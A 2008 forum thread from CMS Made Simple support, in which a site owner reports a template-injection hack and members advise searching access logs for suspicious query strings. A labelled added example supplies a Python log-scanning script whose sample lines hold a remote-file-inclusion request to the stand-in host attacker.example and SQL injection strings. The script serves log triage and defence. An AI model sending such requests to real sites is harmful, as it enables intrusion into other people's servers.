My site was hacked - while running 1.2.5

For questions and problems with the CMS core. This board is NOT for any 3rd party modules, addons, PHP scripts or anything NOT distributed with the CMS made simple package itself.
Jack @ PharSide

My site was hacked - while running 1.2.5

Post by Jack @ PharSide »

Hate to say it, guys, but 1.2.5 is not safe and we should all be aware of this one. I was hacked on that version but was able to recover fairly fast thanks to good backups. It is a hassle, though. It was the same admin hack, I believe, that people have been seeing in the 1.2.4 or earlier versions. It was the one where you went to log in via the admin and there were about 5-6 errors above it. I can't remember what it said, as I tried to rebuild the site fast, but I hope this post helps.

THIS WAS DEF A CMSMS HACK - NO OTHER FILES, DBs OR PASSWORDS HAVE BEEN CHANGED OR STOLEN.

WHAT WAS AFFECTED:
When I noticed it, the fonts were larger than normal on the front end, which was small but absolutely odd. At that point, I logged in to see if something was off with my CSS and I noticed the admin login page had an error message people were getting on the last version when the admin panel had been comp'd. I can't remember what the error was, but it was in the forum at the time I researched it, so I didn't bother documenting it. On the fresh install, I immediately changed the location of the admin folder and, of course, all login info. After looking into it with minimal time, I noticed that they were able to place a nonsense JavaScript in the head of all of the templates, which was blowing out the page formatting (but the site still worked overall), and I am sure some modules/scripts if I dug further.

When I logged into the admin, I noticed a lot of modules that use tab interfaces within the admin were no longer working. The same tag had to be blowing out the admin pages as well. Needless to say, without the tabs working, the CMSMS admin is inoperable.

MY TAKE:
This was def a CMSMS hack specifically. I wouldn't be surprised if this clown searched Google for "Powered by CMSMS" and attacked from there. The bottom line: he couldn't do much but insert some hidden files (that I could not locate) and call them from the head of the templates. Everything else was intact and the site still fully operated with NO visual errors other than the larger than normal text (for the most part). It was as if the JavaScript he inserted was partially erroring out some formatting. But overall, the site was fully functional and, oddly enough, 90% of the styles worked correctly.

Thanks, guys, and I wish I had saved more info. Unfortunately, this was my live consulting website, so when I realized I could not fix what was there, I completely re-uploaded and relaunched. Unfortunately, this will happen again, and next time I will save some code/screens.

-Jack
Last edited by Jack @ PharSide on Fri Jun 06, 2008 3:28 pm, edited 1 time in total.
tinhat
Forum Members
Posts: 65
Joined: Fri May 23, 2008 6:33 am

Re: My site was hacked - while running 1.2.5

Post by tinhat »

Can you get access to the web server log? It would be a good idea to grab that. It could help find out where the exploit is.
Nullig
Power Poster
Posts: 2380
Joined: Fri Feb 02, 2007 4:31 pm

Re: My site was hacked - while running 1.2.5

Post by Nullig »

Had you been hacked with 1.2.4 and updated to 1.2.5?
When you did the fresh install, did you blow away the db and use a "clean" backup?
When you did the fresh install, did you completely wipe all files/directories from the site root, or just overwrite them with the 1.2.5 files?

Nullig
calguy1000
Support Guru
Posts: 8169
Joined: Tue Oct 19, 2004 6:44 pm

Re: My site was hacked - while running 1.2.5

Post by calguy1000 »

As I said in the previous thread... if this is a new issue, we need more information about it.

Please analyze your httpd access logs to see how and when somebody hacked your site.
Follow me on twitter
Please post system information from "Extensions >> System Information" (there is a bbcode option) on all posts asking for assistance.
--------------------
If you can't bother explaining your problem well, you shouldn't expect much in the way of assistance.
blast2007
Power Poster
Posts: 508
Joined: Wed Aug 01, 2007 5:36 pm

Re: My site was hacked - while running 1.2.5

Post by blast2007 »

Can you post other info like:

- PHP version #
- Apache version #
- List of CMSMS modules installed while hacked and version #
- Did you apply any hints from "A small guide to CMSMS system security"?

Regards
blast
Pierre M.

Re: My site was hacked - while running 1.2.5

Post by Pierre M. »

Hello,
Jack @ PharSide wrote: It was the same admin hack I believe that people have been seeing in the 1.2.4 or earlier versions.
It would be good news, as it is easily prevented by small URL filtering.

It needs to be confirmed. Please, as written above, dig in your HTTP logs "to see how and when somebody hacked your site"; "it could help find out where the exploit is."

Pierre M.
Jack @ PharSide

Re: My site was hacked - while running 1.2.5

Post by Jack @ PharSide »

calguy1000 wrote: As I said in the previous thread... if this is a new issue we need more information about it.

Please analyze your httpd access logs to see how and when somebody hacked your site.
That is precisely why I posted, and I assumed people would have questions. When this happened, so much was going through my mind, as IT WAS MY SITE, that I just didn't do a good enough job documenting. However, when I searched the forums with the error message, it was here, so I also thought most people would be familiar. With that being said, I did the best I could in my initial post.

So, to answer some of the questions:

INSTALL HISTORY
The original install of the site was back in Dec. I can't remember the specific release. Then, as new upgrades were announced, I installed them within the first week, as I am always very active on CMSmadesimple.org and the forums. So over time, this site went through 2-4 upgrades. Then, immediately as 1.2.5 was released, again without hesitation, I upgraded. I am not sure of the exact date of 1.2.5, but I did not have any hack problem before or after the upgrade until last Thursday.

DATABASE AND REMOVAL PROCESS FOR THIS PARTICULAR SCENARIO:
I am always better with database backups for clients, but I had one that was a few months old for me. So, instead of 86'ing the DB, I decided to create a subdomain and do a fresh install of v1.2.5. Once I had that, I switched the database to my live site and everything worked perfectly. The JavaScript and all errors were gone. Somehow they are finding a way to include this file in the header without messing with the DB. The interesting thing is I tried to remove and re-upload the admin prior to anything and that obviously DID NOT WORK.

Here are the steps I took to remove it completely in short:
1. Tested DB and new sub domain install
2. Forwarded traffic off to a 15 minute closed splash
3. Deleted every file in root directory
4. Uploaded a fresh copy of all files
5. Added recommended security
6. Changed the admin directory to something outrageously hard to find
7. Changed password to something I forget all the time

Other than uploading time, this would not be too hard of a task if I had good backups. Keep good backups, all; even if people find holes in this or any system, you can be back up and running in 10-20 minutes if you keep good backups. I have learned that first hand. Total time wasted testing and reinstalling = 2.5 hours. Thanks, a**hole :-)

I just got back this morning from a trip, so I haven't had time to grab the logs. I am not that familiar with what I am looking for there, but I am sure you all will help me. I am not a "server guy," although very technical. I will try and post this later today as my Monday schedule clears a little. I'll post all server info, modules installed, log files, and so on that I can find. Any ideas on what I should be looking for within the log files would be appreciated.

Thanks all and I hope I can help here and am certainly willing to furnish what we need to fix it.

Cheers,
-J
Pierre M.

Re: My site was hacked - while running 1.2.5

Post by Pierre M. »

Maybe there are stars in the requests. Search for stars, or http, or union (or other SQL keywords) in the query string, and pay attention to the large requests.

Pierre M.
kermit
Power Poster
Posts: 693
Joined: Thu Jan 26, 2006 11:46 am

Re: My site was hacked - while running 1.2.5

Post by kermit »

Jack @ PharSide wrote: Any ideas on what I should be looking for within the logfiles would be appreciate.
Here are the most recent (failed, due to .htaccess URL filtering) hack attempts we've seen.

The most obvious thing to look for is URLs to other sites in the requested URLs. You'll note every entry below has one.


xxxxxxxxxxxxxxxxxx

Note: IPs and timestamps have portions XX'd out, as does an actual portion of a URL, since that string would have positively identified (#1 result on Google) the site the logs were from.
Last edited by Rolf on Mon Apr 02, 2012 7:47 am, edited 1 time in total.
Reason: removed possible hacked code/links
eternity (n); 1. infinite time, 2. a seemingly long or endless time, 3. the length of time it takes a frozen pizza to cook when you're starving.
4,930,000,000 (n); 1. a very large number, 2. the approximate world population in 1986 when Microsoft Corp issued its IPO. 3. Microsoft's net profit (USD) for the quarter (3 months) ending 31 March 2007.
CMSMS migration and setup services | Hosting with CMSMS installed and ready to go | PM me for Info
Jack @ PharSide

Re: My site was hacked - while running 1.2.5

Post by Jack @ PharSide »

Based on the dates, I don't think these are related, but I thought this one might be interesting to show everyone. I am still working on all the other info; I just wanted to see if anyone thought this might be an attempt of some kind, or maybe a past attempt. I have 6 times as many lines as the forum will allow me to post.


xxxxxxxxxxxxxxxxxxxx
Last edited by Rolf on Mon Apr 02, 2012 12:47 pm, edited 1 time in total.
Reason: removed possible hacked code/links
Pierre M.

Re: My site was hacked - while running 1.2.5

Post by Pierre M. »

It seems the double slash // in the query string is a good filter candidate. I have it in my setups.

Pierre
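As an added example (not code from this thread, from any of its posters, or from CMS Made Simple), here is the log triage that Pierre M. and kermit describe above, in Python: it parses Apache combined-format access-log lines and flags any request whose query string carries a URL to another site, a double slash, SQL keywords such as union/select, a star, or an unusually long request line. The sample log lines, the RFC 5737 test addresses, the placeholder host attacker.example and the 512-character length threshold are all constructed for the illustration; they are not taken from the thread and do not describe a real CMSMS exploit.

```python
"""Scan Apache access-log lines for the request patterns discussed in the thread."""
import re
from urllib.parse import unquote, urlsplit

# Combined log format: ip ident user [time] "method target proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Each indicator is applied to the percent-decoded query string (decoded once).
INDICATORS = [
    ("external_url", re.compile(r"\b(?:https?|ftp)://", re.I)),  # URL to another site
    ("double_slash", re.compile(r"//")),                          # Pierre's filter candidate
    ("sql_keywords", re.compile(r"\bunion\b.*\bselect\b|\bselect\b.*\bfrom\b", re.I | re.S)),
    ("star", re.compile(r"\*")),                                  # "stars in the requests"
]
MAX_TARGET_LEN = 512  # "pay attention to the large requests"; the threshold is an assumption


def classify_target(target, max_len=MAX_TARGET_LEN):
    """Return the list of indicator names that fire for one request target."""
    reasons = []
    query = unquote(urlsplit(target).query)
    for name, rx in INDICATORS:
        if rx.search(query):
            reasons.append(name)
    if len(target) > max_len:
        reasons.append("oversized")
    return reasons


def analyze(log_text, max_len=MAX_TARGET_LEN):
    """Parse combined-format lines and return only the suspicious ones, in log order."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed or non-combined lines rather than guessing
        reasons = classify_target(m["target"], max_len)
        if reasons:
            hits.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"],
                         "target": m["target"], "reasons": reasons})
    return hits


# Constructed sample (not real logs): RFC 5737 test addresses and made-up query strings
# that merely exhibit the patterns; "attacker.example" is a placeholder host.
SAMPLE_LOG = "\n".join([
    '192.0.2.10 - - [05/Jun/2008:14:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [05/Jun/2008:14:01:09 +0000] "GET /index.php?x=http://attacker.example/c.txt? HTTP/1.1" 200 812 "-" "libwww-perl/5.805"',
    '192.0.2.12 - - [05/Jun/2008:14:02:44 +0000] "GET /index.php?id=1//union//select//1,2,3 HTTP/1.1" 200 3300 "-" "Mozilla/4.0"',
    '192.0.2.13 - - [05/Jun/2008:14:03:01 +0000] "GET /index.php?id=1%20UNION%20SELECT%20*%20FROM%20users HTTP/1.1" 200 3300 "-" "Mozilla/4.0"',
    '192.0.2.14 - - [05/Jun/2008:14:04:00 +0000] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '192.0.2.15 - - [05/Jun/2008:14:05:13 +0000] "GET /index.php?q=' + "A" * 600 + ' HTTP/1.1" 200 3300 "-" "Mozilla/4.0"',
])

if __name__ == "__main__":
    for h in analyze(SAMPLE_LOG):
        print(h["ts"], h["ip"], h["status"], ",".join(h["reasons"]), h["target"][:80])
```

To use it on a real server, feed the whole access log to analyze() and read the hits in time order; the first flagged request that returned 200 is usually where the change to the templates was made. The same regular expressions are what a RewriteCond on %{QUERY_STRING} in .htaccess would test for the kind of URL filtering kermit and Pierre M. mention, with the caveat that this script percent-decodes the query string only once, so a double-encoded payload would need a second decoding pass before matching.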
calguy1000
Support Guru
Posts: 8169
Joined: Tue Oct 19, 2004 6:44 pm

Re: My site was hacked - while running 1.2.5

Post by calguy1000 »

I think Ted and I are planning a CMS 1.3.1. There may still be a vulnerability in the Java postlet stuff, so it'll either be fixed once and for all or dropped. Also, there's a fix to the installer, and a few more minor changes that will come out with this.

Stay tuned.